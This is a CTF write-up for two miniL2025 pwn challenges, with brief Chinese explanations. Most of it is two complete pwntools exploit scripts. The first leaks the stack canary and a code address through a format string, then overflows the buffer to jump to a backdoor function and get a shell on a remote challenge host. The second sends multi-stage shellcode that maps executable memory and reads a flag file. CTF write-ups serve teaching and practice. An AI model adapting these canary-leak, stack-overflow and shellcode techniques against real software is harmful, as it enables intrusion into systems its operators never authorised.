
miniL2025_wp

pwn&misc


Postbox

你的好朋友李华刚学C语言,写了个看起来不是很安全的程序。他却自信地说:“那个缓冲区溢出我是知道的,这个程序没问题!” 你刚好在学pwn,不如试试他的程序安不安全?

menu:实际上选项 1 没什么用,因为计数要到选项 2 里才会去算。

关键函数:我们要让 v4=114514,然后使缓冲区不断增大,最后可以溢出去获取 shell。用格式化字符串第一次打印出所需地址的同时,向 a1 中写入数字,使得可以在此进入循环(至少两次才有足够空间打通)。
同时要注意,由于 v4 和 buf 紧贴,输入的时候有一个字节会覆盖到 v4 上,所以我们只能输入 '0' 才能绕过。

from pwn import *
# pwntools defaults for this target: x86-64 Linux, verbose tube logging, gdb in a tmux split.
context.update(log_level='debug', os='linux', arch='amd64')
context.terminal = ['tmux', 'splitw', '-h']
def VIO_TEXT(x):
    """Return *x* rendered in bright magenta (SGR 95) followed by an attribute reset."""
    magenta, reset = "\x1b[95m", "\x1b[0m"
    return magenta + format(x) + reset

#io=process("./pwn")
# Local copy of the binary for symbol offsets; the tube itself goes to the remote instance.
elf = ELF(path="./pwn")
io = remote(host="198.18.0.1", port=64318)
# gdb.attach(io,gdbscript="""
# b *$rebase(0x13ec) 
# b *$rebase(0x1569) #断在printf中间进行调试
# """)
# Thin wrappers around the global tube `io`, kept as short names for the exploit body.
def se(data):
    """Raw send on the tube."""
    return io.send(data)

def sa(delim, data):
    """Wait for *delim*, then send *data*."""
    return io.sendafter(delim, data)

def sl(data):
    """Send *data* followed by a newline."""
    return io.sendline(data)

def sla(delim, data):
    """Wait for *delim*, then send *data* plus a newline."""
    return io.sendlineafter(delim, data)

def rc(num):
    """Receive up to *num* bytes."""
    return io.recv(num)

def rl():
    """Receive one line."""
    return io.recvline()

def ru(delims):
    """Receive until *delims* is seen."""
    return io.recvuntil(delims)

def uu32(data):
    """Right-pad *data* with NULs to 4 bytes and unpack it with u32."""
    return u32(data.ljust(4, b'\x00'))

def uu64(data):
    """Right-pad *data* with NULs to 8 bytes and unpack it with u64."""
    return u64(data.ljust(8, b'\x00'))

def ia():
    """Hand the tube over to the user."""
    return io.interactive()

def get_64():
    """Read up to the next 0x7f byte and unpack the trailing 6 bytes with u64."""
    tail = io.recvuntil(b'\x7f')[-6:]
    return u64(tail.ljust(8, b'\x00'))

def get_32():
    """Read up to the next 0xf7 byte and unpack the trailing 4 bytes with u32."""
    tail = io.recvuntil(b'\xf7')[-4:]
    return u32(tail.ljust(4, b'\x00'))

def send(content):
    """Pick menu option 1, then deliver *content* at the contents prompt."""
    choice_prompt = b"Give me your choice:\n"
    sla(choice_prompt, '1')
    sa(b"contents:\n", content)

def script(content):
    """Pick menu option 2, then deliver *content* at the contents prompt."""
    choice_prompt = b"Give me your choice:\n"
    sla(choice_prompt, '2')
    sa(b"contents:\n", content)

# File-relative symbol offsets; combined later with the leaked runtime main() to rebase.
main_off = elf.symbols['main']
backdoor_off = elf.symbols['Inval1dFunction']

# Stage 1: set v4 to 114514 through option 2, then use the format-string round
# to leak the stack canary and a runtime main() address from the program's output.
payload=cyclic(0x2fc)+p64(114514) # stale data survives because the local is never initialised; the padding relies on the send/script offset to reach it (author's note)
script(payload)
ru(b'contents:\n')
# se(b"0"+b"-%p"*50)  # earlier probe form of the leak input (author's note)
se(b"0"+b"%3c%7$n"+b"-%43$p"+b'-%57$p')  # leak input: '0' is the only value that can be sent without breaking the byte overlapping v4; the %p's print the canary and other addresses (author's note)
io.recv()  # NOTE(review): unconditional drain; if the '-0x' output lands in this chunk the recvuntil below blocks — confirm against the binary's output order
ru(b"-0x")
canary=int(rc(16),16)  # 16 hex digits: the full 8-byte canary
ru(b'-0x')
main_addr=int(io.recv(12),16)  # 12 hex digits: assumes a 6-byte code address — TODO confirm
log.success(VIO_TEXT(f"canary:{hex(canary)}"))
log.success(VIO_TEXT(f"main_addr:{hex(main_addr)}"))
backdoor=main_addr-main_off+backdoor_off  # rebase: runtime main() minus its file offset gives the load base; add the backdoor's file offset
log.success(VIO_TEXT(f"backdoor_addr:{hex(backdoor)}"))

# Stage 2: overflow past the buffer with the leaked canary restored so the saved
# return address becomes the backdoor; sent once per loop iteration (two, per the writeup).
payload=cyclic(264)+p64(canary)+p64(0)+p64(backdoor)  # 264 bytes pad, canary, one zero qword (presumably the saved rbp slot — TODO confirm), return address
# pause()
io.recv()  # drain pending output before sending
se(payload)
payload=cyclic(264)+p64(canary)+p64(0)+p64(backdoor+0x8) # +8 enters the backdoor past its stack-frame setup (author's note)
io.recv()
se(payload)
sl(b"cat flag")  # sent to the shell the writeup expects the backdoor to spawn
io.interactive()

Ex-Aid lv.2

CHECKIN Bugster

给大家推荐一下学长用c&cpp重写的seccomp-tools——ceccomp!
并且已收录到 AUR 库中,yay 一键安装;快捷方便的 make install 胜过 seccomp,并且有非常好的补全。

from pwn import *
from pwn import shellcraft
# pwntools defaults for this target: x86-64 Linux, verbose tube logging, gdb in a tmux split.
context(log_level='debug', os='linux', arch='amd64')
context.terminal = ['tmux', 'splitw', '-h']
def VIO_TEXT(x):
    """Return *x* rendered in bright magenta (SGR 95) followed by an attribute reset."""
    return "".join(("\x1b[95m", format(x), "\x1b[0m"))

# Local run of the challenge binary (argv given as a list).
io = process(["./pwn"])
# io = remote("172.17.0.1",42583)

# gdb.attach(io,gdbscript="""
#     b *$rebase(0x14ff)
# """)


def se(data):
    """Raw send on the global tube."""
    sent = io.send(data)
    return sent

def sa(delim, data):
    """Wait for *delim* on the global tube, then send *data*."""
    result = io.sendafter(delim, data)
    return result

def sl(data):
    """Send *data* plus a newline on the global tube."""
    result = io.sendline(data)
    return result

def sla(delim, data):
    """Wait for *delim* on the global tube, then send *data* plus a newline."""
    result = io.sendlineafter(delim, data)
    return result

def rc(num):
    """Receive up to *num* bytes from the global tube."""
    chunk = io.recv(num)
    return chunk

def rl():
    """Receive one line from the global tube."""
    line = io.recvline()
    return line

def ru(delims):
    """Receive from the global tube until *delims* is seen."""
    chunk = io.recvuntil(delims)
    return chunk

def uu32(data):
    """Right-pad *data* with NULs to 4 bytes and unpack it with u32."""
    padded = data.ljust(4, b"\x00")
    return u32(padded)

def uu64(data):
    """Right-pad *data* with NULs to 8 bytes and unpack it with u64."""
    padded = data.ljust(8, b"\x00")
    return u64(padded)

def ia():
    """Hand the global tube over to the user."""
    session = io.interactive()
    return session

def get_64():
    """Read up to the next 0x7f byte and unpack the trailing 6 bytes with u64."""
    raw = io.recvuntil(b"\x7f")
    tail = raw[-6:]
    return u64(tail.ljust(8, b"\x00"))

def get_32():
    """Read up to the next 0xf7 byte and unpack the trailing 4 bytes with u32."""
    raw = io.recvuntil(b"\xf7")
    tail = raw[-4:]
    return u32(tail.ljust(4, b"\x00"))


# Stage 1: a small stager written as three segments that chain via short jumps
# (see the note below); it maps a region with PROT 7, reads stage 2 into it and jumps there.
shellcode = asm('''
    xor edi,edi
    mov esi,4096
    mov r10,0x22
    add ebx,21
    add rdx,0x20 
    jmp rdx 
    nop

    mov eax,9 
    not r8
    mov r9,0 
    add rdx,0x20 
    jmp rdx 
    nop 
    nop 
    nop 

    mov edx,7 
    syscall 
    mov rsi,rax 
    xor eax,eax 
    mov rdx,0x100 
    syscall 
    jmp rsi 
    ''')
# `add rdx,0x20` does the short jump from buf[0] to buf[2]; all three segments are padded to 0x18 bytes: buf[0] sets the arguments, buf[1] prepares the call, buf[2] calls mmap, keeps the returned address in rsi, then calls read (eax=0) into it — giving orw (author's note)
info("then:len of shellcode is %d" % len(shellcode))
sa(b"signin~", shellcode)  # delivered right after the 'signin~' banner

# Stage 2: open/read/write sequence built with shellcraft, assembled and sent after a short pause.
stages = [
    shellcraft.open("./flag"),
    shellcraft.read("rax", "rsp", 0x100),
    shellcraft.write(1, "rsp", 0x100),
]
shellcode = "".join(stages)
info("then:len of shellcode2 is %d" % len(shellcode))

payload = asm(shellcode)
pause(1)
se(payload)

io.interactive()